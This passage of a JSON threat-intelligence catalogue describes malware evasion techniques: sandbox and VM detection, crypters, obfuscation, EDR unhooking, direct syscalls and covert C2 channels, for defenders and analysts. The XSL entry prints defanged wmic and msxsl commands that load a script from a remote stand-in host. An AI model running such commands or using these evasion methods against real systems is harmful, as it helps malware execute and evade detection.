"description": "As per Microsoft's documentation, `BlockInput` function \"prevents keyboard and mouse input events from reaching applications,\" effectively restricting user interaction with the system. \r\n\r\nMalware occasionally employs this tactic to hinder analysis by debuggers or other analysis tools throughout the process' runtime. To deactivate the block, the program must make a live call to `BlockInput` with the parameter 0. Windows automatically lifts the block when the process ends or the user initiates `Ctrl+Alt+Del`.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://malware.news/t/art-of-anti-detection-4-self-defense/32182",
"creation_date": "2024-03-22T06:24:53.208170Z",
"tags": "blockinput, keyboard",
"modification_date": "2024-03-22T06:24:53.208229Z",
"category": [
14
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
37
]
},
{
"id": 368,
"key": "retrieve-hdd-information",
"unprotect_id": "U1343",
"name": "Retrieve HDD Information",
"description": "Malware can figure out if it's in a virtual environment by checking hard drive info. It looks for specific details like serial and model numbers. This is easier to spot in VirtualBox because it shows clues that it's running in a virtual space. \r\n\r\nMalware uses this trick to avoid getting caught. It does this by using a special command in the DeviceIoControl Win32 API, called IOCTL SMART_RCV_DRIVE_DATA. But, to use this command, you need top-level access.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://nicolabottura.github.io/HDDInfo-Evasion-PoC.html",
"creation_date": "2024-03-20T23:27:16.117731Z",
"tags": "malware-detection, virtual-environment-evasion, hard-drive-inspection, virtualbox, deviceiocontrol-api, root-privileges, cybersecurity-tactics, evasion-techniques",
"modification_date": "2024-03-20T23:27:16.117783Z",
"category": [
1
],
"rules": [
157
],
"attachments": [],
"featured_api": [],
"contributors": [
36
]
},
{
"id": 367,
"key": "buildcommdcbandtimeouta",
"unprotect_id": "U1342, T1497.002",
"name": "BuildCommDCBAndTimeoutA",
"description": "This technique uses a `BuildCommDCBAndTimeoutsA` API call to determine if the malware is detonating in a sandbox. Normally, a bogus device string would cause this API call to fail. However, some malware sandbox environments may emulate in a way that allows the API call to succeed even when given a bogus device string.",
"windows": "",
"linux": "",
"macos": "",
"resources": "",
"creation_date": "2024-03-20T00:00:50.060144Z",
"tags": "BuildCommDCBAndTimeoutsA, sandbox evasion",
"modification_date": "2024-03-20T00:10:09.498989Z",
"category": [
1
],
"rules": [
156
],
"attachments": [],
"featured_api": [],
"contributors": [
35
]
},
{
"id": 366,
"key": "limecrypter",
"unprotect_id": "U1436",
"name": "LimeCrypter",
"description": "Limecrypter is a sophisticated obfuscation tool designed for both native and .NET files. It employs a unique approach to secure payloads by encrypting them within a .NET-based stub. This stub acts as a container for the encrypted payload, ensuring its contents remain concealed until execution.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/NYAN-x-CAT/Lime-Crypter/tree/master\r\nhttps://www.youtube.com/watch?v=TgYb3hwOAV4",
"creation_date": "2024-01-18T01:13:04.663000Z",
"tags": "crypter, limecrypter",
"modification_date": "2024-01-18T01:13:27.449000Z",
"category": [
12
],
"rules": [
155
],
"attachments": [],
"featured_api": [],
"contributors": [
32
]
},
{
"id": 365,
"key": "pyarmor",
"unprotect_id": "U1435",
"name": "PyArmor",
"description": "Pyarmor is a command-line tool primarily used for the obfuscation of Python scripts. While its original design aims to protect Python code from unauthorized access and reverse engineering, its capabilities also make it a tool of interest for malware obfuscation. Pyarmor achieves this through several key features, each with potential applications in both legitimate protection and malicious exploitation:\r\n\r\n- Code Obfuscation: Pyarmor transforms original Python scripts into a form that is significantly more difficult to understand and decompile. This obfuscation process, which alters code structure, names, and other identifiable features while preserving functionality, is a common tactic in malware to conceal harmful operations and evade detection by analysis tools and researchers.\r\n\r\n- Machine Binding: The tool offers the option to bind obfuscated scripts to a specific machine. In legitimate use, this adds security and control over script distribution. In a malware context, this can be misused to target specific victims or to avoid execution in analysis environments, thus evading detection and analysis.\r\n\r\n- Expiration Setting: Pyarmor can set an expiration date for the obfuscated scripts. While beneficial for creating trial software in legitimate scenarios, this feature can be exploited in malware to limit the script's lifespan, making post-infection analysis and reverse engineering more challenging.",
"windows": "",
"linux": "",
"macos": "",
"resources": "http://pyarmor.dashingsoft.com/\r\nhttps://github.com/dashingsoft/pyarmor",
"creation_date": "2024-01-18T01:09:12.754000Z",
"tags": "python, obfuscation",
"modification_date": "2024-01-18T01:09:12.754000Z",
"category": [
12
],
"rules": [
154
],
"attachments": [],
"featured_api": [],
"contributors": [
5,
32
]
},
{
"id": 364,
"key": "niximports",
"unprotect_id": "U1434",
"name": "NixImports",
"description": "A .NET malware loader employs API-Hashing and dynamic invocation to circumvent static analysis. NixImports utilizes managed API-Hashing to dynamically determine most of its required functions during runtime. For function resolution, HInvoke needs two specific hashes: typeHash and methodHash, representing the type name and the method's full name, respectively. At runtime, HInvoke scans the entire mscorlib to locate the corresponding type and method. Consequently, HInvoke doesn't generate any import references for the methods accessed through it.\r\n\r\nAdditionally, NixImports is designed to minimize the use of well-known methods. Wherever possible, it opts for internal methods over their standard wrappers. This strategy helps in evading the basic hooks and monitoring systems used by certain security tools.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/dr4k0nia/NixImports/tree/master\r\nhttps://dr4k0nia.github.io/posts/NixImports-a-NET-loader-using-HInvoke/",
"creation_date": "2024-01-14T07:42:17.781000Z",
"tags": "NixImports, packer, .net",
"modification_date": "2024-01-14T07:47:41.089000Z",
"category": [
12
],
"rules": [
148,
149
],
"attachments": [],
"featured_api": [],
"contributors": [
32,
34
]
},
{
"id": 363,
"key": "powershell-special-characters-obfuscation",
"unprotect_id": "U0709",
"name": "PowerShell Special Characters Obfuscation",
"description": "PowerShell scripts can be obfuscated using methods that encode commands exclusively with special characters. This technique aims to complicate analysis and potentially evade detection mechanisms. \r\n\r\nAttackers frequently employ these tactics to hide the true functionalities of the script, making the analysis more challenging.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-EncodedSpecialCharOnlyCommand.ps1\r\nhttps://perl-users.jp/articles/advent-calendar/2010/sym/11",
"creation_date": "2024-01-12T10:26:52.204000Z",
"tags": "PowerShell, obfuscation",
"modification_date": "2024-01-12T10:31:41.654000Z",
"category": [
7
],
"rules": [
147
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 362,
"key": "purecrypter",
"unprotect_id": "U1433",
"name": "PureCrypter",
"description": "PureCrypter, a multi-functional crypter/loader developed in C#, was first introduced in hacking forums on March 17, 2021. This tool is compatible with both 32-bit and 64-bit native as well as .NET payloads. It features multiple injection modes, including reflection, RunPE, and shellcode. PureCrypter can deliver payloads either via a URL or offline. It has been noted for its use in conjunction with various RATs and infostealers, such as Remcos, AsyncRAT, Redline Stealer, and Arkei.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
"creation_date": "2024-01-09T23:56:58.234000Z",
"tags": "PureCrypter, Packer",
"modification_date": "2024-01-09T23:56:58.234000Z",
"category": [
12
],
"rules": [
143
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 361,
"key": "truecrypt",
"unprotect_id": "U1432",
"name": "TrueCrypt",
"description": "TrueCrypt, a crypter developed and sold by the developers behind Meduza Stealer, which features LoadPE functionality and is written in Golang, supports both native (x32) and .NET binaries. This crypter has been used by Lumma, Vidar, Raccoon, MetaStealer, Redline stealers, and DCRAT.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://www.resecurity.com/blog/article/new-version-of-medusa-stealer-released-in-dark-web",
"creation_date": "2024-01-07T03:34:48.764000Z",
"tags": "truecrypt, packer",
"modification_date": "2024-01-07T03:34:48.764000Z",
"category": [
12
],
"rules": [
141
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 360,
"key": "easycrypter",
"unprotect_id": "U1431",
"name": "EasyCrypter",
"description": "EasyCrypter is the crypter that is being sold via an automated bot on Telegram. The crypter uses a method known as \"mutation\", which involves replacing instructions in the file with their analogues or a sequence of instructions that yield the same outcome as the original code. EasyCrypter supports a maximum file size of 5MB and is only applicable for x86 .NET/Native files.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://teletype.in/@dinerosell/EasyCrypterFAQ_RU",
"creation_date": "2024-01-05T22:18:00.904000Z",
"tags": "packers, easycrypter",
"modification_date": "2024-01-05T22:18:00.904000Z",
"category": [
12
],
"rules": [
139
],
"attachments": [],
"featured_api": [],
"contributors": [
33
]
},
{
"id": 359,
"key": "funcin",
"unprotect_id": "U0132,U0221,U0308",
"name": "FuncIn",
"description": "FuncIn involves a payload staging strategy wherein the entire set of malicious functionalities is not contained within the malware file itself or any third-party file/network location (e.g., a web server). Instead, these functionalities are transmitted over the network by the Command and Control (C2) server when required.\r\n\r\nThis approach addresses three primary issues in malware development. Firstly, it mitigates the size of the malware, as most functionalities are not directly embedded in the malware. Functioning as a network loader, the malware can be very compact (often just a few kilobytes). Secondly, it tackles the challenges posed by malware analysis and detection. The absence of most malicious functionalities physically within the malware or its immediate dependencies can make reverse engineering and detection more challenging. For instance, if the malware loader expects specific characteristics to be met before transmitting the rest of the payload (e.g., geographic location, system requirements, certain user or host machine behaviour, and properties), analysis becomes difficult until the complete payload is downloaded. Lastly, it addresses maintenance concerns. The majority of the code residing on the C2 side makes maintenance more convenient. Malicious actors do not need to update the remote loader but only the shellcodes (functionalities) located on the C2, transmitted when needed. \r\n\r\nOne notable example of malware leveraging the FuncIn technique is PoisonIvy RAT, a famous Remote Access Trojan. Despite its compact size, typically less than 8 kilobytes, PoisonIvy RAT incorporated a wide range of expected functions for a RAT, including webcam capture, screen capture, password enumeration, system management, and file management etc..\r\n\r\nThe author of PoisonIvy RAT employed an approach of using precompiled pieces of code (shellcodes). However, with the advent of more modern tools, it is now easily feasible to compile the shellcodes just in time (JIT) before sending them to the loader. This JIT compilation enhances the adaptability and sophistication of the malware, allowing it to dynamically adjust its functionalities based on specific criteria.\r\n\r\nUnlike classic PIC , shellcodes commonly used in binary exploitation, FuncIn doesn't rely on library loading or API hashing mechanisms (at least, it don’t need to, except for additional evasion mechanisms) directly within the shellcode. Instead, these tasks are delegated to the loader, which then transmits essential information to the Command and Control (C2) server for shellcode JIT compilation or patching.\r\n\r\nAnother alternative to the FuncIn technique is loading malware functionalities through extra DLL files that are reflected to avoid being written to disk, minimising physical evidence. This approach relies on DLLs rather than shellcode, offering several advantages. In addition to supporting any high-level programming language for coding extra features, using DLLs makes it easier to maintain and extend the malware's capabilities.\r\n\r\nHowever, it's important to note that while relying on DLLs provides advantages in terms of ease of maintenance, extensibility, and language support, it may be less optimised and stealthy compared to the approach of utilising small, fully controlled pieces of code that the malware author has mastered. The choice between these techniques often involves trade-offs, considering factors such as the specific goals of the malware, the targeted systems, and the overall strategy of the threat actor.\r\n\r\nAttached to this description, you will discover a comprehensive project showcasing the FuncIn Evasion Technique, implemented with the assistance of the [Keystone Engine](https://www.keystone-engine.org). This project is designed to expand, incorporating additional examples in various programming languages. Given that the majority of the functionality resides in the shellcode, the choice of programming language for the loader is not highly restrictive. It's essential to note that the loader is typically compact and straightforward, tasked with loading and executing pieces of code within its process space.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/Unprotect-Project/FuncInEvasionTechniqueDemo/tree/main",
"creation_date": "2023-12-13T16:08:17.059000Z",
"tags": "Shellcode, FuncIn, Plugins, Reflection, DLL, JIT",
"modification_date": "2023-12-13T16:37:18.308000Z",
"category": [
2,
3,
5,
8
],
"rules": [],
"attachments": [],
"featured_api": [
3,
4,
5
],
"contributors": [
4
]
},
{
"id": 358,
"key": "process-argument-spoofing",
"unprotect_id": "U1243",
"name": "Process Argument Spoofing",
"description": "Process Argument Spoofing is a technique used by attackers to hide their true intentions by changing the command line arguments of a process after it has started.",
"windows": "This is done by tampering with the Process Environment Block (PEB).\r\n\r\nThe PEB is a structure in Windows that holds various information about a running process. Within the PEB, there's a specific section called `RTL_USER_PROCESS_PARAMETERS`. This section contains an attribute named CommandLine, which is structured as a `UNICODE_STRING`. The CommandLine attribute is crucial because it stores the command line arguments that were used to start the process.\r\n\r\nAttackers exploit this by modifying the CommandLine attribute's buffer. When they change the contents of this buffer, the command line arguments that are visible to monitoring tools and security analysts are altered. This means that even if a process was started with malicious intentions, the attackers can overwrite these initial arguments with harmless-looking ones. As a result, the process can appear legitimate to security systems and analysts, and potentially hiding the malicious activity.\r\n\r\nThe sophistication of Process Argument Spoofing lies in its ability to alter process information after the process has been created and initially inspected by security tools, making it a bit more challenging to detect.",
"linux": "`argv[0]` is the first argument on a process' command line, typically representing the name or path of the executable. For most processes, `argv[0]` can be set to an arbitrary value without it affecting the process flow.\r\n\r\n Detections relying on command-line arguments may, by manipulating `argv[0]`, be bypassed. For example:\r\n\r\n * Setting `argv[0]` to an empty string may bypass detections that look for the executable name in the command line component;\r\n * Similarly, by setting `argv[0]` to a different executable name, it may be possible to bypass detections, or fool security analysts by making them believe the command is doing something different;\r\n * By putting a very long string in `argv[0]`, it may be possible to 'hide' the actual command-line arguments at the very end; and,\r\n * By including known detection exclusions in `argv[0]`, it may be possible to prevent the alerting logic from triggering.",
"macos": "",
"resources": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/\r\nhttps://www.bordergate.co.uk/argument-spoofing/\r\nhttps://www.wietzebeukema.nl/blog/why-bother-with-argv0",
"creation_date": "2023-12-12T05:13:02.378000Z",
"tags": "Process Argument Spoofing, PEB Manipulation, Command Line Argument Tampering, Low-Level System Manipulation,",
"modification_date": "2024-11-18T09:56:34.544125Z",
"category": [
4
],
"rules": [],
"attachments": [],
"featured_api": [
6,
357,
625
],
"contributors": [
30,
47
]
},
{
"id": 357,
"key": "smb-named-pipes",
"unprotect_id": "U9011",
"name": "SMB / Named Pipes",
"description": "Named Pipes are a feature of the Windows operating system that allow for inter-process communication (IPC) using a pipe metaphor. These are particularly useful in networking scenarios as they can be made accessible over a network and facilitate a client-server model of communication. The SMB (Server Message Block) protocol is commonly used in Windows environments for shared access to files, printers, and other network services.\r\n\r\nWhen malware uses Named Pipes over the SMB protocol for network evasion, it is essentially wrapping its communication in layers of legitimate-looking traffic. Named Pipes can be set up to pass data packets that may appear harmless or even normal to network monitoring tools. This makes detection harder because the malicious traffic is mixed with regular, authorized network activity.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://learn.microsoft.com/en-us/windows/win32/ipc/named-pipes?WT_mc_id=SEC-MVP-5005282\nhttps://learn.microsoft.com/en-us/dotnet/standard/io/pipe-operations?WT_mc_id=SEC-MVP-5005282\nhttps://github.com/DarkCoderSc/SharpShellPipe",
"creation_date": "2023-08-27T16:55:16.842000Z",
"tags": "Named Pipes, SMB, Network, Pivot, Evasion",
"modification_date": "2023-10-04T10:44:36.278000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [
620,
621,
622,
624
],
"contributors": [
4
]
},
{
"id": 356,
"key": "right-to-left-override-rlo-extension-spoofing",
"unprotect_id": "U1010",
"name": "Right-to-Left Override (RLO) Extension Spoofing",
"description": "The **Right-to-Left Override** (RLO) character (`U+202E`) is a Unicode control character used for bidirectional text formatting. It affects the way text is displayed, causing text following the RLO character to be rendered from right to left, which is typically used in languages like Arabic and Hebrew.\r\n\r\nHowever, malicious actors have found a way to exploit this Unicode character to deceive users by using it in file extensions. By strategically placing the RLO character within a file name, they can manipulate the visual appearance of the extension while maintaining its actual content.\r\n\r\nFor example, consider a file named \"invoice.pdf\" with the RLO character followed by malicious code: `invoice\\u202Efdp.exe`. When displayed in certain contexts, it may appear as `invoiceexe.pdf` (hiding the \".exe\" extension) instead of the actual \"invoice.pdf.exe\". This tactic aims to trick users into believing the file is harmless when, in reality, it could be a dangerous executable.",
"windows": "",
"linux": "",
"macos": "",
"resources": "",
"creation_date": "2023-08-03T06:17:48.602000Z",
"tags": "Extension, Spoof, RLO, Filename",
"modification_date": "2024-01-15T00:01:09.968000Z",
"category": [
14
],
"rules": [
151
],
"attachments": [],
"featured_api": [],
"contributors": [
4,
32
]
},
{
"id": 355,
"key": "dll-unhooking",
"unprotect_id": "U0522",
"name": "DLL Unhooking",
"description": "Endpoint Detection and Response (EDR) tools use a technique known as hooking to monitor sensitive system functions within the DLLs of loaded processes. Hooking is a method of live-patching system DLLs, enabling EDRs to intercept the flow of a program and evaluate its legitimacy.\r\n\r\nHere's how it works: EDRs modify the first instructions of the functions within the DLLs. When these functions are called, the program's execution flow is diverted to the EDR's code (housed within a DLL loaded by the EDR in the program). In this redirected state, the EDR can inspect the function's arguments to determine whether their usage is legitimate or potentially malicious. If the usage is deemed legitimate, the EDR restores the program's execution flow, allowing the function to proceed as normal.\r\n\r\nHowever, to evade detection by an EDR, malware can employ a method known as \"unhooking.\" This process involves restoring the entire DLL code section (.text) to its original state. To accomplish this, malware needs access to an unmodified (unhooked) DLL, which it can acquire in several ways: \r\n\r\n1 - directly from the system, which can potentially be detected via an open handle; \r\n\r\n2 - by opening a remote file, which requires the malware author to host a DLL matching the OS version of the target system remotely;\r\n\r\n3 - by initiating a suspended process and retrieving the content of its DLL before it gets hooked.\r\n\r\nTypically, the DLL most commonly hooked/unhooked is NTDLL.dll, as it is the closest to the kernel. However, some EDRs may also hook APIs contained in higher-level DLLs, such as kernel32.dll or user32.dll.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/optiv/Freeze\nhttps://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++",
"creation_date": "2023-07-03T23:56:46.302000Z",
"tags": "",
"modification_date": "2023-10-04T10:43:56.825000Z",
"category": [
2
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": [
29
]
},
{
"id": 354,
"key": "shikata-ga-nai-sgn",
"unprotect_id": "U0708",
"name": "Shikata Ga Nai (SGN)",
"description": "Shikata Ga Nai (SGN) is a data obfuscation technique that employs a polymorphic binary encoding scheme. It was initially developed by Ege Balci and gained popularity through its implementation in Metasploit Framework's msfvenom. SGN takes a binary input and generates a self-decoding obfuscated shellcode. The algorithm utilizes a XOR feedback loop for encoding and prefixes a decoding routine to the payload. Additional garbage instructions are added to enhance obfuscation and make the payload highly resistant to static heuristic analysis. The resulting blob can be executed from the first instruction, which will decode and run the original binary payload. It's important to note that the SGN-encoded shellcode requires a RWX (Read-Write-Execute) protected memory space for proper execution.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/EgeBalci/sgn\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb\nhttps://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong",
"creation_date": "2023-07-03T23:47:32.505000Z",
"tags": "Shikata Ga Nai (SGN), data obfuscation, polymorphic binary encoding scheme, Ege Balci, msfvenom, self-decoding obfuscated shellcode, XOR feedback loop",
"modification_date": "2023-10-04T10:44:32.987000Z",
"category": [
7
],
"rules": [
134
],
"attachments": [],
"featured_api": [],
"contributors": [
29
]
},
{
"id": 353,
"key": "c2-via-ftps",
"unprotect_id": "U0910",
"name": "C2 via FTP(S)",
"description": "C2 via FTP is a technique that utilizes the File Transfer Protocol (FTP) to establish command and control communication between an attacker and victim systems. It involves sending commands and receiving responses within FTP sessions, effectively using FTP as a conduit for covert communication.\r\n\r\nTo implement C2 via FTP, an attacker needs control over an FTP server, and must establish a connection to a compromised system that has access to an external network. The victim’s system must be capable of initiating FTP sessions with the attacker's server. Additionally, the attacker could employ various means of obfuscation to make the traffic appear innocuous and blend in with legitimate FTP traffic.\r\n\r\nC2 via FTP can serve diverse objectives, such as remotely executing commands, managing malware, or orchestrating multistage attacks. Detecting C2 via FTP can be challenging, as FTP is a widely-used protocol for legitimate file transfers, and the malicious traffic may not raise alarms in a network’s security monitoring systems. Moreover, if FTPS (FTP Secure) is used, the data is encrypted, adding an additional layer of complexity to detection.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://github.com/DarkCoderSc/SharpFtpC2",
"creation_date": "2023-06-12T08:10:43.726000Z",
"tags": "C2, FTP, FTPS, File",
"modification_date": "2023-10-04T10:44:31.505000Z",
"category": [
9
],
"rules": [],
"attachments": [],
"featured_api": [
603,
604,
606,
607,
608,
610,
613,
614,
616
],
"contributors": [
4
]
},
{
"id": 352,
"key": "evasion-using-direct-syscalls",
"unprotect_id": "U0521",
"name": "Evasion using direct Syscalls",
"description": "In the Windows operating system, conventional malware frequently utilizes strategies involving the invocation of specific functions from the kernel32.dll library, such as `VirtualAlloc`, `VirtualProtect`, and `CreateThread`. A closer inspection of the call stack reveals that the functions employed from kernel32.dll eventually trigger corresponding functions within the ntdll.dll library. This is facilitated by the ntdll.dll library, which serves as the gateway to the Windows kernel, executing this transition via system calls (syscalls). Hence, any function invoked from kernel32.dll will subsequently prompt one or more associated functions within ntdll.dll. To illustrate, the `VirtualProtect` function from kernel32.dll corresponds to the `NtProtectVirtualMemory` function in ntdll.dll.\r\n\r\nEndpoint Detection and Response (EDR) and Antivirus (AV) systems generally hook onto the ntdll.dll, but only for a handful of crucial functions often exploited by malware. These systems actively monitor potentially exploitable behavior.\r\n\r\nThis technique can also be used for sandbox evasion. Some sandboxes log only higher-level WinAPI or NT API calls, but do not monitor or hook syscalls (or sysenters). Sandboxes that are missing these events will not see these calls. To combat this technique, ensure your sandboxes are able to log/hook syscalls and kernel function calls.\r\n\r\n## Unique Aspects of This Technique\r\nThe distinctiveness of this technique lies in its ability to invoke direct syscalls using assembly without calling upon any kernel32 or ntdll functions. It also bypasses the implementation of createthread by directly jumping to a custom heap variable, altering its protection, and finally returning for a clean exit - all without the need to allocate memory, change protection, and copy the payload to the new memory location.\r\n\r\nAnother intriguing aspect is the flexibility in naming the extern functions. These functions need not necessarily be called `VirtualProtect` or `VirtualAlloc`. They can have any arbitrary name of your choice, which enhances the complexity of analysis, particularly when disassembled. For instance, it could be named `myCustomDontProtect`, or even something obscure like `rYTBbmNPTDoscUV`.\r\n\r\n## Operational Mechanism\r\nThe main function initiates by setting up markers using inline assembly and then calls an extern function to unprotect the heap variable location containing the executable payload (in this instance, 'calc'). This extern function is converted into assembly code that triggers the syscall. Subsequently, the main function conserves the registers and prompts payload execution via another extern function. This function, in turn, translates to a \"jmp\" instruction that directs execution to the heap location, executing the payload. The payload contains instructions to return via another \"jmp\" instruction. The return location is preserved in the R15 register using inline assembly in the main function. Post return to the main function, the registers are restored, and the program gracefully terminates.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://medium.com/@merasor07/av-edr-evasion-using-direct-system-calls-user-mode-vs-kernel-mode-fad2fdfed01a\r\nhttps://github.com/ghostpepper108/Evasion",
"creation_date": "2023-05-18T23:39:48.016000Z",
"tags": "Kernel32.dll, VirtualAlloc, VirtualProtect, CreateThread, Call stack, Ntdll.dll, Syscall, NtProtectVirtualMemory, EDRs/AVs, Hook onto ntdll.dll, Direct syscalls, Assembly, Heap variable",
"modification_date": "2024-01-14T23:57:50.362000Z",
"category": [
2
],
"rules": [
150
],
"attachments": [],
"featured_api": [],
"contributors": [
11,
27,
32
]
},
{
"id": 351,
"key": "hells-gate",
"unprotect_id": "U0520",
"name": "Hell's Gate",
"description": "The Hell's Gate technique refers to a specific method used by malware authors to make their software more difficult to detect and analyze. The technique involves the use of a custom native API resolver to resolve Windows API functions at runtime dynamically.\r\n\r\nBy using Hell's Gate, malware can avoid referencing the Windows API functions directly in the Import Address Table (IAT). This makes it harder for security analysts and automated tools to identify and trace the malware's behavior. The technique essentially hides the malware's intentions by obfuscating the API calls it uses to perform its malicious activities.\r\n\r\nThe Hell's Gate malware technique is a method used by malware authors to dynamically resolve Windows API functions at runtime, making the malware more difficult to analyze and detect. It achieves this by bypassing the conventional method of statically linking API functions in the Import Address Table.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://teamhydra.blog/2020/09/18/implementing-direct-syscalls-using-hells-gate/\nhttps://rioasmara.com/2022/03/09/hellgate-technique-on-av-bypass/",
"creation_date": "2023-04-02T03:05:42.415000Z",
"tags": "hellsgate, AV bypass, IAT, Obfuscation",
"modification_date": "2023-10-04T10:44:54.981000Z",
"category": [
2
],
"rules": [],
"attachments": [
"fbcc6ce5-437d-4b87-ab51-a753f404e104"
],
"featured_api": [],
"contributors": []
},
{
"id": 350,
"key": "xsl-script-processing",
"unprotect_id": "T1220",
"name": "XSL Script Processing",
"description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. \r\n\r\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to Trusted Developer Utilities Proxy Execution, the Microsoft common line transformation utility binary (msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.\r\n\r\nCommand-line examples:\r\n\r\nmsxsl.exe customers[.]xml script[.]xsl\r\nmsxsl.exe script[.]xsl script[.]xsl\r\nmsxsl.exe script[.]jpeg script[.]jpeg\r\nAnother variation of this technique, dubbed \"Squiblytwo\", involves using Windows Management Instrumentation to invoke JScript or VBScript within an XSL file. This technique can also execute local/remote scripts and, similar to its Regsvr32/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in Windows Management Instrumentation provided they utilize the /FORMAT switch.\r\nCommand-line examples:\r\n\r\nLocal File: wmic process list /FORMAT:evil[.]xsl\r\nRemote File: wmic os get /FORMAT:\"https[:]//example[.]com/evil[.]xsl\"",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1220/",
"creation_date": "2023-03-21T00:00:35.711000Z",
"tags": "Defense Evasion,\r\nbypass application control,\r\nExtensible Stylesheet Language (XSL),\r\nexecute arbitrary files,\r\nMicrosoft common line transformation utility binary (msxsl.exe),\r\nexecute malicious embedded JavaScript,\r\nXSL files,\r\nSquiblytwo,\r\nWindows Management Instrumentation,\r\n/FORMAT,",
"modification_date": "2023-10-04T10:44:30.142000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 349,
"key": "virtualizationsandbox-evasion-time-based-evasion",
"unprotect_id": "T1497.003",
"name": "Virtualization/Sandbox Evasion: Time Based Evasion",
"description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\r\n\r\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: Scheduled Task/Job). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.\r\n\r\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as Pings, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments. Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).\r\n\r\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1497/003/",
"creation_date": "2023-03-20T23:56:48.796000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME),\r\nsandbox,\r\ndelaying malware functionality,\r\nsleep commands,\r\nnative system scheduling functionality,\r\nevent based triggers,\r\nscheduled Multi-Stage Channels,\r\nAPI hammering,\r\ntimestamp sampling,",
"modification_date": "2023-10-04T10:43:59.645000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 348,
"key": "virtualizationsandbox-evasion-user-activity-based-checks",
"unprotect_id": "T1497.002",
"name": "Virtualization/Sandbox Evasion: User Activity Based Checks",
"description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.\r\n\r\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks, browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro or waiting for a user to double click on an embedded image to activate",
"windows": "",
"linux": "",
"macos": "",
"resources": "https://attack.mitre.org/techniques/T1497/002/",
"creation_date": "2023-03-20T23:53:34.833000Z",
"tags": "Defense Evasion, \r\nDiscovery,\r\nvirtual machine environment (VME),\r\nsandbox,\r\nmonitor mouse clicks,",
"modification_date": "2023-10-04T10:43:55.889000Z",
"category": [
10
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 347,
"key": "virtualizationsandbox-evasion-system-checks",
"unprotect_id": "T1497.001",
"name": "Virtualization/Sandbox Evasion: System Checks",
